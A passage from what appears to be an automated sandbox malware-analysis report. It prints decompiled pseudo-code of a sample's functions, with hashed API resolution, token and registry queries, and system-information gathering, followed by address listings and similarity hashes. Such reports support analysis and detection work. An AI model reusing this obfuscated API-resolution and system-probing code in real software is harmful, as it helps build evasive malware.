																											if( *_t205() == 0) {
																												_t258 =  *0x8cb1f4; // 0xec1568
																												if(_t258 == 0xc139578) {
																													 *0x8cb1f4 = 0;
																													goto L107;
																												} else {
																													if(_t258 == 0) {
																														L107:
																														_push(0xa1310f65);
																														_t206 = E008A7564(0xa1310f65);
																														if(_t206 == 0) {
																															if(E008A6C50(0xa1310f65) != 0) {
																																_push(0xa1310f65);
																																_t206 = E008A7564(0xa1310f65);
																															}
																														}
																														if(_t206 == 0) {
																															goto L114;
																														} else {
																															_t285 = _t285 + 0xfffffff8;
																															_t155 = E008A67C8(_t206, 0xea5f6acc);
																															goto L110;
																														}
																													} else {
																														do {
																															_t236 = 0;
																															_t158 = 0;
																															while( *((intOrPtr*)(_t158 + _t258 + 8)) != 0xea5f6acc) {
																																_t236 = _t236 + 1;
																																_t158 = _t158 + 0x18;
																																if(_t236 < 0x10) {
																																	continue;
																																} else {
																																	goto L106;
																																}
																																goto L186;
																															}
																															_t155 =  *((intOrPtr*)(_t158 + _t258 + 0x14));
																															if(_t155 != 0) {
																																L110:
																																if(_t155 == 0) {
																																	L114:
																																	if(0 != 0) {
																																		goto L87;
																																	} else {
																																		goto L51;
																																	}
																																} else {
																																	asm("int3");
																																	return _t155;
																																}
																															} else {
																																goto L107;
																															}
																															goto L186;
																															L106:
																															asm("o16 nop [eax+eax]");
																															_t258 =  *(_t258 + 0x180);
																														} while (_t258 != 0);
																														goto L107;
																													}
																												}
																											} else {
																												L51:
																												_t207 =  *(_t285 + 0x24);
																												if( *_t278 <= 0) {
																													L67:
																													if(_t207 == 0 || _t207 == 0xffffffff) {
																														_t133 = 1;
																													} else {
																														_t133 = 0;
																													}
																													if(_t133 != 0) {
																														L84:
																														E008B9510(_t285);
																														if( *((char*)(_t285 + 0x2c)) != 0) {
																															E008BBE30(_t285 + 0x28, _t272);
																														}
																														return 0;
																													} else {
																														_t259 =  *0x8cb1f4; // 0xec1568
																														if(_t259 == 0xc139578) {
																															 *0x8cb1f4 = 0;
																															goto L79;
																														} else {
																															if(_t259 == 0) {
																																L79:
																																_push(0x3ab94787);
																																_t281 = E008A7564(0x3ab94787);
																																if(_t281 == 0) {
																																	if(E008A6C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t281 = E008A7564(0x3ab94787);
																																	}
																																}
																																if(_t281 == 0) {
																																	goto L84;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t141 = E008A67C8(_t281, 0x9d775c6);
																																	goto L82;
																																}
																															} else {
																																do {
																																	_t233 = 0;
																																	_t144 = 0;
																																	while( *((intOrPtr*)(_t144 + _t259 + 8)) != 0x9d775c6) {
																																		_t233 = _t233 + 1;
																																		_t144 = _t144 + 0x18;
																																		if(_t233 < 0x10) {
																																			continue;
																																		} else {
																																			goto L78;
																																		}
																																		goto L186;
																																	}
																																	_t141 =  *((intOrPtr*)(_t144 + _t259 + 0x14));
																																	if(_t141 != 0) {
																																		L82:
																																		if(_t141 == 0) {
																																			goto L84;
																																		} else {
																																			_push(_t207);
																																			asm("int3");
																																			return _t141;
																																		}
																																	} else {
																																		goto L79;
																																	}
																																	goto L186;
																																	L78:
																																	asm("o16 nop [eax+eax]");
																																	_t259 =  *(_t259 + 0x180);
																																} while (_t259 != 0);
																																goto L79;
																															}
																														}
																													}
																												} else {
																													 *(_t285 + 0x18) = _t207;
																													 *((intOrPtr*)(_t285 + 0x1c)) = _t272;
																													_t273 = _t278;
																													 *((intOrPtr*)(_t285 + 0x20)) = _t270;
																													_t283 = 0;
																													do {
																														_t261 =  *0x8cb1f4; // 0xec1568
																														if(_t261 == 0xc139578) {
																															 *0x8cb1f4 = 0;
																															goto L60;
																														} else {
																															if(_t261 == 0) {
																																L60:
																																_push(0x3ab94787);
																																_t209 = E008A7564(0x3ab94787);
																																if(_t209 == 0) {
																																	if(E008A6C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t209 = E008A7564(0x3ab94787);
																																	}
																																}
																																if(_t209 == 0) {
																																	goto L65;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t150 = E008A67C8(_t209, 0x68adfb76);
																																	goto L63;
																																}
																															} else {
																																do {
																																	_t235 = 0;
																																	_t149 = 0;
																																	while( *((intOrPtr*)(_t149 + _t261 + 8)) != 0x68adfb76) {
																																		_t235 = _t235 + 1;
																																		_t149 = _t149 + 0x18;
																																		if(_t235 < 0x10) {
																																			continue;
																																		} else {
																																			goto L59;
																																		}
																																		goto L186;
																																	}
																																	_t150 =  *((intOrPtr*)(_t149 + _t261 + 0x14));
																																	if(_t150 != 0) {
																																		L63:
																																		if(_t150 == 0) {
																																			goto L65;
																																		} else {
																																			_push( *((intOrPtr*)(_t273 + 4 + _t283 * 8)));
																																			_push( *(_t285 + 0x28));
																																			asm("int3");
																																			return _t150;
																																		}
																																	} else {
																																		goto L60;
																																	}
																																	goto L186;
																																	L59:
																																	asm("o16 nop [eax+eax]");
																																	_t261 =  *(_t261 + 0x180);
																																} while (_t261 != 0);
																																goto L60;
																															}
																														}
																														goto L186;
																														L65:
																														_t283 = _t283 + 1;
																													} while (_t283 <  *_t273);
																													_t207 =  *(_t285 + 0x18);
																													_t272 =  *((intOrPtr*)(_t285 + 0x1c));
																													goto L67;
																												}
																											}
																										}
																									} else {
																										goto L46;
																									}
																									goto L186;
																									L45:
																									asm("o16 nop [eax+eax]");
																									_t255 =  *(_t255 + 0x180);
																								} while (_t255 != 0);
																								goto L46;
																							}
																						}
																					}
																				} else {
																					L36:
																					E008B9510(_t285);
																					if( *((char*)(_t285 + 0x2c)) != 0) {
																						E008BBE30(_t285 + 0x28, _t272);
																					}
																					return 0;
																				}
																			} else {
																				goto L32;
																			}
																			goto L186;
																			L31:
																			asm("o16 nop [eax+eax]");
																			_t250 =  *(_t250 + 0x180);
																		} while (_t250 != 0);
																		goto L32;
																	}
																}
															} else {
																if( *((char*)(_t285 + 0x2c)) != 0) {
																	E008BBE30(_t285 + 0x28, _t272);
																}
																goto L25;
															}
														} else {
															_t174 = GetTokenInformation( *(_t285 + 0x44), 2, 0, 0, _t285 + 0x30); // executed
															if(_t174 == 0) {
																_t267 =  *0x8cb1f4; // 0xec1568
																if(_t267 == 0xc139578) {
																	 *0x8cb1f4 = 0;
																	goto L155;
																} else {
																	if(_t267 == 0) {
																		L155:
																		_push(0xa1310f65);
																		_t213 = E008A7564(0xa1310f65);
																		if(_t213 == 0) {
																			if(E008A6C50(0xa1310f65) != 0) {
																				_push(0xa1310f65);
																				_t213 = E008A7564(0xa1310f65);
																			}
																		}
																		if(_t213 == 0) {
																			goto L22;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t179 = E008A67C8(_t213, 0xea5f6acc);
																			goto L158;
																		}
																	} else {
																		do {
																			_t242 = 0;
																			_t182 = 0;
																			while( *((intOrPtr*)(_t182 + _t267 + 8)) != 0xea5f6acc) {
																				_t242 = _t242 + 1;
																				_t182 = _t182 + 0x18;
																				if(_t242 < 0x10) {
																					continue;
																				} else {
																					goto L154;
																				}
																				goto L186;
																			}
																			_t179 =  *((intOrPtr*)(_t182 + _t267 + 0x14));
																			if(_t179 != 0) {
																				L158:
																				if(_t179 == 0) {
																					goto L22;
																				} else {
																					asm("int3");
																					return _t179;
																				}
																			} else {
																				goto L155;
																			}
																			goto L186;
																			L154:
																			asm("o16 nop [eax+eax]");
																			_t267 =  *(_t267 + 0x180);
																		} while (_t267 != 0);
																		goto L155;
																	}
																}
															} else {
																goto L22;
															}
														}
													} else {
														goto L17;
													}
													goto L186;
													L16:
													asm("o16 nop [eax+eax]");
													_t249 =  *(_t249 + 0x180);
												} while (_t249 != 0);
												goto L17;
											}
										}
									}
								}
							} else {
								goto L6;
							}
							goto L186;
							L5:
							asm("o16 nop [eax+eax]");
							_t246 =  *(_t246 + 0x180);
						} while (_t246 != 0);
						goto L6;
					}
				}
				L186:
			}

0x008a47b0
0x008a47b0
0x008a47b2
0x008a47b5
0x008a47bb
0x008a47c9
0x008a50e3
0x00000000
0x008a47cf
0x008a47d1
0x008a47fe
0x008a4803
0x008a4809
0x008a480d
0x008a50ba
0x008a50c5
0x008a50cb
0x008a50cb
0x008a50ba
0x008a4815
0x00000000
0x008a481b
0x008a4822
0x008a482a
0x00000000
0x008a482a
0x008a47d3
0x008a47d3
0x008a47d3
0x008a47d5
0x008a47d7
0x008a47e5
0x008a47e6
0x008a47ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a47ec
0x008a50d2
0x008a50d8
0x008a482c
0x008a482e
0x008a48fc
0x008a4903
0x008a4834
0x008a4838
0x008a4839
0x008a483b
0x008a4841
0x008a504d
0x008a5054
0x008a507a
0x008a507c
0x00000000
0x008a507e
0x008a507e
0x008a507f
0x008a507f
0x008a5056
0x008a505b
0x008a5061
0x008a5065
0x008a509d
0x008a50a4
0x008a50aa
0x008a50aa
0x008a509d
0x008a5069
0x008a508d
0x008a5082
0x00000000
0x008a5088
0x00000000
0x008a5088
0x008a506b
0x008a5072
0x008a5075
0x00000000
0x008a5075
0x008a5069
0x008a4847
0x008a4847
0x008a484b
0x008a4851
0x008a4855
0x008a485a
0x008a4868
0x008a5038
0x00000000
0x008a486e
0x008a4870
0x008a489d
0x008a48a2
0x008a48a8
0x008a48ac
0x008a500f
0x008a501a
0x008a5020
0x008a5020
0x008a500f
0x008a48b4
0x00000000
0x008a48b6
0x008a48bd
0x008a48c5
0x00000000
0x008a48c5
0x008a4872
0x008a4872
0x008a4872
0x008a4874
0x008a4876
0x008a4884
0x008a4885
0x008a488b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a488b
0x008a5027
0x008a502d
0x008a48c7
0x008a48c9
0x008a48e4
0x008a48e4
0x008a48ea
0x008a4904
0x008a4909
0x008a490e
0x008a491a
0x008a4f51
0x00000000
0x008a4920
0x008a4922
0x008a494f
0x008a4954
0x008a495a
0x008a495e
0x008a4f28
0x008a4f33
0x008a4f39
0x008a4f39
0x008a4f28
0x008a4966
0x00000000
0x008a4968
0x008a496f
0x008a4977
0x00000000
0x008a4977
0x008a4924
0x008a4924
0x008a4924
0x008a4926
0x008a4928
0x008a4936
0x008a4937
0x008a493d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a493d
0x008a4f40
0x008a4f46
0x008a4979
0x008a497b
0x008a49a3
0x008a49ad
0x008a49b8
0x008a49b9
0x008a49ba
0x008a49bb
0x008a49bd
0x008a49c5
0x008a4e71
0x008a4e7d
0x008a4f10
0x00000000
0x008a4e83
0x008a4e85
0x008a4eae
0x008a4eb3
0x008a4eb9
0x008a4ebd
0x008a4ef5
0x008a4efc
0x008a4f02
0x008a4f02
0x008a4ef5
0x008a4ec1
0x00000000
0x008a4ec3
0x008a4eca
0x008a4ecd
0x00000000
0x008a4ecd
0x008a4e87
0x008a4e87
0x008a4e87
0x008a4e89
0x008a4e8b
0x008a4e95
0x008a4e96
0x008a4e9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a4e9c
0x008a4f06
0x008a4f0c
0x008a4ed2
0x008a4ed4
0x008a4ee5
0x008a4eda
0x00000000
0x008a4ee0
0x00000000
0x008a4ee0
0x008a4ed6
0x008a4ed6
0x008a4ed7
0x008a4ed7
0x008a4f0e
0x00000000
0x008a4f0e
0x00000000
0x008a4e9e
0x008a4e9e
0x008a4ea4
0x008a4eaa
0x00000000
0x008a4e87
0x008a4e85
0x008a49cb
0x008a49cb
0x008a49d6
0x008a49df
0x008a49e4
0x008a49e9
0x008a49ef
0x008a49f7
0x008a4a01
0x008a4e62
0x00000000
0x008a4a07
0x008a4a09
0x008a4a36
0x008a4a3b
0x008a4a41
0x008a4a45
0x008a4e39
0x008a4e44
0x008a4e4a
0x008a4e4a
0x008a4e39
0x008a4a4d
0x00000000
0x008a4a53
0x008a4a5a
0x008a4a62
0x00000000
0x008a4a62
0x008a4a0b
0x008a4a0b
0x008a4a0b
0x008a4a0d
0x008a4a0f
0x008a4a1d
0x008a4a1e
0x008a4a24
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a4a24
0x008a4e51
0x008a4e57
0x008a4a64
0x008a4a66
0x008a4bef
0x008a4bf2
0x008a4bfc
0x008a4c02
0x008a4c02
0x008a4c0e
0x008a4a6c
0x008a4a76
0x008a4a77
0x008a4a78
0x008a4a79
0x008a4a7a
0x008a4a7b
0x008a4a7c
0x008a4a7d
0x008a4a82
0x008a4a84
0x008a4a86
0x008a4a8b
0x008a4d80
0x008a4d8c
0x008a4e21
0x00000000
0x008a4d92
0x008a4d94
0x008a4dbf
0x008a4dc4
0x008a4dca
0x008a4dce
0x008a4e06
0x008a4e0d
0x008a4e13
0x008a4e13
0x008a4e06
0x008a4dd2
0x00000000
0x008a4dd4
0x008a4ddb
0x008a4dde
0x00000000
0x008a4dde
0x008a4d96
0x008a4d98
0x008a4d98
0x008a4d9a
0x008a4d9c
0x008a4da6
0x008a4da7
0x008a4dad
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a4dad
0x008a4e17
0x008a4e1d
0x008a4de3
0x008a4de5
0x008a4df6
0x008a4deb
0x00000000
0x008a4df1
0x00000000
0x008a4df1
0x008a4de7
0x008a4de7
0x008a4de8
0x008a4de8
0x008a4e1f
0x00000000
0x008a4e1f
0x00000000
0x008a4daf
0x008a4daf
0x008a4db5
0x008a4dbb
0x00000000
0x008a4d98
0x008a4d94
0x008a4a91
0x008a4a91
0x008a4a91
0x008a4a99
0x008a4b47
0x008a4b49
0x008a4b54
0x008a4b50
0x008a4b50
0x008a4b50
0x008a4b5b
0x008a4bcf
0x008a4bd2
0x008a4bdc
0x008a4be2
0x008a4be2
0x008a4bee
0x008a4b5d
0x008a4b5d
0x008a4b69
0x008a4d2d
0x00000000
0x008a4b6f
0x008a4b71
0x008a4ba0
0x008a4ba5
0x008a4bab
0x008a4baf
0x008a4d04
0x008a4d0f
0x008a4d15
0x008a4d15
0x008a4d04
0x008a4bb7
0x00000000
0x008a4bb9
0x008a4bc0
0x008a4bc3
0x00000000
0x008a4bc3
0x008a4b73
0x008a4b75
0x008a4b75
0x008a4b77
0x008a4b79
0x008a4b87
0x008a4b88
0x008a4b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a4b8e
0x008a4d1c
0x008a4d22
0x008a4bc8
0x008a4bca
0x00000000
0x008a4bcc
0x008a4bcc
0x008a4bcd
0x008a4bce
0x008a4bce
0x008a4d28
0x00000000
0x008a4d28
0x00000000
0x008a4b90
0x008a4b90
0x008a4b96
0x008a4b9c
0x00000000
0x008a4b75
0x008a4b71
0x008a4b69
0x008a4a9f
0x008a4aa1
0x008a4aa5
0x008a4aa9
0x008a4aab
0x008a4aaf
0x008a4ab1
0x008a4ab1
0x008a4abd
0x008a4d71
0x00000000
0x008a4ac3
0x008a4ac5
0x008a4af4
0x008a4af9
0x008a4aff
0x008a4b03
0x008a4d48
0x008a4d53
0x008a4d59
0x008a4d59
0x008a4d48
0x008a4b0b
0x00000000
0x008a4b0d
0x008a4b14
0x008a4b17
0x00000000
0x008a4b17
0x008a4ac7
0x008a4ac9
0x008a4ac9
0x008a4acb
0x008a4acd
0x008a4adb
0x008a4adc
0x008a4ae2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a4ae2
0x008a4d60
0x008a4d66
0x008a4b1c
0x008a4b1e
0x00000000
0x008a4b20
0x008a4b20
0x008a4b24
0x008a4b28
0x008a4b29
0x008a4b29
0x008a4d6c
0x00000000
0x008a4d6c
0x00000000
0x008a4ae4
0x008a4ae4
0x008a4aea
0x008a4af0
0x00000000
0x008a4ac9
0x008a4ac5
0x00000000
0x008a4b32
0x008a4b32
0x008a4b33
0x008a4b3b
0x008a4b3f
0x00000000
0x008a4b43
0x008a4a99
0x008a4a8b
0x008a4e5d
0x00000000
0x008a4e5d
0x00000000
0x008a4a26
0x008a4a26
0x008a4a2c
0x008a4a32
0x00000000
0x008a4a0b
0x008a4a09
0x008a4a01
0x008a497d
0x008a497d
0x008a4980
0x008a498a
0x008a4990
0x008a4990
0x008a499c
0x008a499c
0x008a4f4c
0x00000000
0x008a4f4c
0x00000000
0x008a493f
0x008a493f
0x008a4945
0x008a494b
0x00000000
0x008a4924
0x008a4922
0x008a48ec
0x008a48f1
0x008a48f7
0x008a48f7
0x00000000
0x008a48f1
0x008a48cb
0x008a48da
0x008a48de
0x008a4f60
0x008a4f6c
0x008a4fda
0x00000000
0x008a4f6e
0x008a4f70
0x008a4f99
0x008a4f9e
0x008a4fa4
0x008a4fa8
0x008a4ff2
0x008a4ff9
0x008a4fff
0x008a4fff
0x008a4ff2
0x008a4fac
0x00000000
0x008a4fb2
0x008a4fb9
0x008a4fbc
0x00000000
0x008a4fbc
0x008a4f72
0x008a4f72
0x008a4f72
0x008a4f74
0x008a4f76
0x008a4f80
0x008a4f81
0x008a4f87
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a4f87
0x008a4fd0
0x008a4fd6
0x008a4fc1
0x008a4fc3
0x00000000
0x008a4fc9
0x008a4fc9
0x008a4fca
0x008a4fca
0x008a4fd8
0x00000000
0x008a4fd8
0x00000000
0x008a4f89
0x008a4f89
0x008a4f8f
0x008a4f95
0x00000000
0x008a4f72
0x008a4f70
0x00000000
0x00000000
0x00000000
0x008a48de
0x008a5033
0x00000000
0x008a5033
0x00000000
0x008a488d
0x008a488d
0x008a4893
0x008a4899
0x00000000
0x008a4872
0x008a4870
0x008a4868
0x008a4841
0x008a50de
0x00000000
0x008a50de
0x00000000
0x008a47ee
0x008a47ee
0x008a47f4
0x008a47fa
0x00000000
0x008a47d3
0x008a47d1
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 008A48DA

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 1ddecc73cc9a90168901a770e0aed62a912295f91af2cdee181db34ee4e54501
Instruction ID: 88d1e8af6e00dc8c4bee7691db7d3dd28f81f586c44dd82f8854a167153634fe
Opcode Fuzzy Hash: 1ddecc73cc9a90168901a770e0aed62a912295f91af2cdee181db34ee4e54501
Instruction Fuzzy Hash: 3912E4207043469BFF249AA9888176A7295FBD3318F2CA63DE541CBE56FFF4CC458252

Uniqueness

Uniqueness Score: -1.00%

Function 008BC2D0, Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E008BC2D0(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, void* _a8, void* _a12) {
				char _v28;
				char _v32;
				unsigned int _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				long* _v56;
				long _v60;
				long* _v64;
				int _v68;
				intOrPtr _v72;
				signed int _v76;
				long _v80;
				unsigned int _t57;
				signed int* _t59;
				void* _t62;
				void* _t66;
				void* _t74;
				long _t75;
				void* _t76;
				void** _t77;
				long _t78;
				long* _t82;
				void* _t83;
				long _t84;
				long _t102;
				short* _t107;
				long _t117;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t125;
				long _t127;
				void* _t130;
				long _t132;
				intOrPtr _t135;
				long _t136;
				long _t140;
				void* _t142;
				long* _t143;

				_push(__esi);
				_push(__edi);
				_t143 = _t142 - 0x40;
				_t82 = __ecx;
				E008A3930(__ecx, 0, __edi, __esi);
				_t130 =  !=  ? 0 : 0x100;
				_t121 =  <=  ? 0x3000f : 0x20009;
				_t122 = ( <=  ? 0x3000f : 0x20009) | 0x00000100;
				E008A8810( &_v40, 0x104);
				_t107 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t107 != 0) {
					 *_t107 = 0;
				}
				_t140 = _a8;
				_t57 = E008B9650(_a4) >> 2;
				if(_t57 > 0) {
					_v56 =  &(_t82[3]);
					_v44 = 0;
					_t16 = _t57 - 1; // -1
					_v76 = _t122;
					_v68 = _t16;
					_v72 = _t130 + 0x20009;
					_t132 = 0;
					_v52 = _t57;
					_v64 = _t82;
					_t123 = 0;
					while(1) {
						L15:
						_t59 = E008B9640(_a4, _t123 * 4);
						_t83 = 0;
						_v48 = _t123;
						_t124 =  *_t59 ^ 0x38ba5c7b;
						_v52 = _t132;
						while(1) {
							_t62 = E008A15C0(0x3ab94787, 0xf561ae8b);
							if(_t62 != 0) {
								break;
							}
							E008AA0D0( &_v40,  &_v32);
							E008A83B0( &_v28);
							_t66 = E008BD620(_v28, E008B6040(_v28, 0x7fffffff));
							E008B0B10( &_v28);
							if(_t66 != _t124) {
								E008A8CA0( &_v32);
								_t83 = _t83 + 1;
								continue;
							} else {
								_t125 = _v44;
								_t135 =  *((intOrPtr*)( &_v32 - 0x10));
								E008A8CA0( &_v32);
								if(_t125 != 0) {
									E008A96D0(_v56, 0x5c);
								}
								E008B0220(_v56, _v40, 0);
								_v68 = 0;
								if(E008A15C0(0x3ab94787, 0xd5493f9) == 0) {
									_t117 = 0;
								} else {
									_t77 =  &_v60;
									_t104 =  ==  ?  *((void*)(_t77 - 0x10)) :  *((intOrPtr*)(_t77 - 0xc));
									_t78 = RegOpenKeyExW(_a8,  *(_t77[1]), 0,  ==  ?  *((void*)(_t77 - 0x10)) :  *((intOrPtr*)(_t77 - 0xc)), _t77); // executed
									_t117 = _t78;
								}
								_t84 = _v60;
								if(_t84 == 0 || _t84 == 0xffffffff) {
									L37:
									_t82 = _v64;
									_t136 = _t117;
									goto L4;
								} else {
									if(_t135 == 0) {
										L34:
										_t123 = _t125 + 1;
										_t140 = _t84;
										if(_t123 < _v52) {
											_t132 = 1;
											goto L15;
										} else {
											goto L37;
										}
									} else {
										if(_t140 == 0 || _t140 == 0xffffffff) {
											_t75 = 1;
										} else {
											_t75 = 0;
										}
										if(_t75 != 0) {
											goto L34;
										} else {
											_v80 = _t117;
											_t76 = E008A15C0(0x3ab94787, 0x91935d4e);
											_t117 =  *_t143;
											if(_t76 == 0) {
												goto L34;
											} else {
												_push(_t140);
												_v80 = _t117;
												asm("int3");
												return _t76;
											}
										}
									}
								}
							}
							goto L38;
						}
						_push(_v36 >> 1);
						_push(_v40);
						_push(_t83);
						_push(_t140);
						asm("int3");
						return _t62;
						goto L38;
					}
				} else {
					_t136 = 0;
					L4:
					if(_t82[2] == 0) {
						L12:
						_t82[1] = _t140;
						_t82[2] = 1;
						E008A8CA0( &_v40);
						 *_t82 = _t136;
						return _t136;
					} else {
						_t127 = _t82[1];
						if(_t127 == 0 || _t127 == 0xffffffff) {
							_t102 = 1;
						} else {
							_t102 = 0;
						}
						if(_t102 != 0) {
							goto L12;
						} else {
							_t74 = E008A15C0(0x3ab94787, 0x91935d4e);
							if(_t74 == 0) {
								goto L12;
							} else {
								_push(_t127);
								asm("int3");
								return _t74;
							}
						}
					}
				}
				L38:
			}

0x008bc2d0
0x008bc2d1
0x008bc2d4
0x008bc2d7
0x008bc2db
0x008bc2f4
0x008bc30b
0x008bc30e
0x008bc310
0x008bc315
0x008bc31a
0x008bc31e
0x008bc31e
0x008bc325
0x008bc32e
0x008bc333
0x008bc393
0x008bc399
0x008bc39d
0x008bc3a0
0x008bc3a4
0x008bc3a8
0x008bc3ac
0x008bc3ae
0x008bc3b2
0x008bc3b6
0x008bc3bf
0x008bc3bf
0x008bc3cb
0x008bc3d2
0x008bc3d9
0x008bc3dd
0x008bc3df
0x008bc3e3
0x008bc3ed
0x008bc3f4
0x00000000
0x00000000
0x008bc418
0x008bc425
0x008bc43e
0x008bc449
0x008bc450
0x008bc523
0x008bc528
0x00000000
0x008bc456
0x008bc456
0x008bc45e
0x008bc461
0x008bc468
0x008bc470
0x008bc470
0x008bc47f
0x008bc484
0x008bc49f
0x008bc4c3
0x008bc4a1
0x008bc4a5
0x008bc4ac
0x008bc4bd
0x008bc4bf
0x008bc4bf
0x008bc4c5
0x008bc4cb
0x008bc537
0x008bc537
0x008bc53b
0x00000000
0x008bc4d2
0x008bc4d4
0x008bc510
0x008bc510
0x008bc511
0x008bc517
0x008bc3ba
0x00000000
0x008bc51d
0x00000000
0x008bc51d
0x008bc4d6
0x008bc4d8
0x008bc4e3
0x008bc4df
0x008bc4df
0x008bc4df
0x008bc4ea
0x00000000
0x008bc4ec
0x008bc4f6
0x008bc4fa
0x008bc4ff
0x008bc504
0x00000000
0x008bc506
0x008bc506
0x008bc507
0x008bc50b
0x008bc50c
0x008bc50c
0x008bc504
0x008bc4ea
0x008bc4d4
0x008bc4cb
0x00000000
0x008bc450
0x008bc3fc
0x008bc3fd
0x008bc401
0x008bc402
0x008bc403
0x008bc404
0x00000000
0x008bc404
0x008bc335
0x008bc335
0x008bc337
0x008bc33b
0x008bc36c
0x008bc36c
0x008bc373
0x008bc377
0x008bc37c
0x008bc387
0x008bc33d
0x008bc33d
0x008bc342
0x008bc34d
0x008bc349
0x008bc349
0x008bc349
0x008bc354
0x00000000
0x008bc356
0x008bc360
0x008bc367
0x00000000
0x008bc369
0x008bc369
0x008bc36a
0x008bc36b
0x008bc36b
0x008bc367
0x008bc354
0x008bc33b
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b94c39eb1dd3cc4c03db39bb29c4b9ed014fec119dce0f03e24c3972616c08
Instruction ID: d89e1ad8e3eb6b79f0c439aa1f9b02fe2fdb7faf2bb30c0e01915636a325534f
Opcode Fuzzy Hash: 02b94c39eb1dd3cc4c03db39bb29c4b9ed014fec119dce0f03e24c3972616c08
Instruction Fuzzy Hash: 9161AD316083019BD714DE28C890AABB7E5FFC9754F148A2DA95ADB391EA30DC05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008A430F, Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E008A430F(void* __eax, intOrPtr __ebx, void* __esi, void* __ebp, char _a4, struct _SYSTEM_INFO _a344, intOrPtr _a356, intOrPtr _a360, intOrPtr _a364, short _a372, intOrPtr _a380, char _a384, char _a388, char _a400, char _a404, char _a408) {
				char _v0;
				void* _v4;
				char _v16;
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t64;
				void* _t69;

				_t47 = __ebx;
				if(__eax == 0) {
					E008B9510( &_a4);
					if(_a408 != 0) {
						E008BBE30( &_a404, __esi);
					}
				} else {
					__edx =  *0x8cb1f4; // 0xec1568
					if(__edx == 0xc139578) {
						 *0x8cb1f4 = 0;
						L26:
						__eax = 0x3ab94787;
						_push(0x3ab94787);
						_v4 = E008A7564(0x3ab94787);
						if(_v4 == 0) {
							__ecx = 0x3ab94787;
							__eax = E008A6C50(0x3ab94787);
							if(__al != 0) {
								__eax = 0x3ab94787;
								_push(0x3ab94787);
								 *__esp = E008A7564(0x3ab94787);
							}
						}
						if(_v4 == 0) {
							L42:
							__ecx =  &_v0;
							__eax = E008B9510( &_v0);
							if(_a404 != 0) {
								__ecx =  &_a400;
								__eax = E008BBE30( &_a400, __esi);
							}
							goto L1;
						} else {
							__esp = __esp + 0xfffffff8;
							__edx = 0xc4b8bd35;
							__eax = _v4;
							__edx = E008A67C8(_v4, 0xc4b8bd35);
							L29:
							if(__edx == 0) {
								goto L42;
							}
							 *__edi & 0x000000ff = ( *__edi & 0x000000ff) - 1;
							__eax =  *__edx( *__esi, ( *__edi & 0x000000ff) - 1);
							if(__eax == 0) {
								goto L42;
							}
							__eax =  *__eax;
							if(__eax == 0) {
								__esi = 1;
							} else {
								if(__eax == 0x1000) {
									__esi = 2;
								} else {
									if(__eax == 0x2100) {
										__esi = 4;
									} else {
										if(__eax == 0x2000) {
											__esi = 3;
										} else {
											if(__eax == 0x3000) {
												__esi = 5;
											} else {
												if(__eax != 0x4000) {
													__esi = 7;
													__esi =  !=  ? __ebx : 7;
												} else {
													__esi = 6;
												}
											}
										}
									}
								}
							}
							__ecx =  &_v16;
							__eax = E008B9510( &_v16);
							if(_a388 != 0) {
								__ecx =  &_a384;
								__eax = E008BBE30( &_a384, __esi);
							}
							L2:
							_t35 =  *0x8cb1f0; // 0xee59a0
							 *((intOrPtr*)(_t35 + 0x2c)) = _t64;
							_t56 =  *0x8cb1f4; // 0xec1568
							if(_t56 == 0xc139578) {
								 *0x8cb1f4 = 0;
								L9:
								_push(0xa1310f65);
								_t48 = E008A7564(0xa1310f65);
								if(_t48 == 0) {
									if(E008A6C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t48 = E008A7564(0xa1310f65);
									}
								}
								if(_t48 == 0) {
									goto L14;
								} else {
									_t69 = _t69 + 0xfffffff8;
									_t59 = E008A67C8(_t48, 0x4e85f18d);
									goto L12;
								}
							} else {
								if(_t56 == 0) {
									goto L9;
								} else {
									goto L5;
								}
								do {
									L5:
									_t54 = _t47;
									_t45 = _t54;
									while( *((intOrPtr*)(_t45 + _t56 + 8)) != 0x4e85f18d) {
										_t54 = _t54 + 1;
										_t45 = _t45 + 0x18;
										if(_t54 < 0x10) {
											continue;
										}
										goto L8;
									}
									_t59 =  *((intOrPtr*)(_t45 + _t56 + 0x14));
									if(_t59 != 0) {
										L12:
										if(_t59 != 0) {
											GetSystemInfo( &_a344);
										}
										L14:
										_t39 =  *0x8cb1f0; // 0xee59a0
										 *((short*)(_t39 + 0xe)) = _a372;
										 *((intOrPtr*)(_t39 + 0x10)) = _a356;
										 *((intOrPtr*)(_t39 + 0x14)) = _a360;
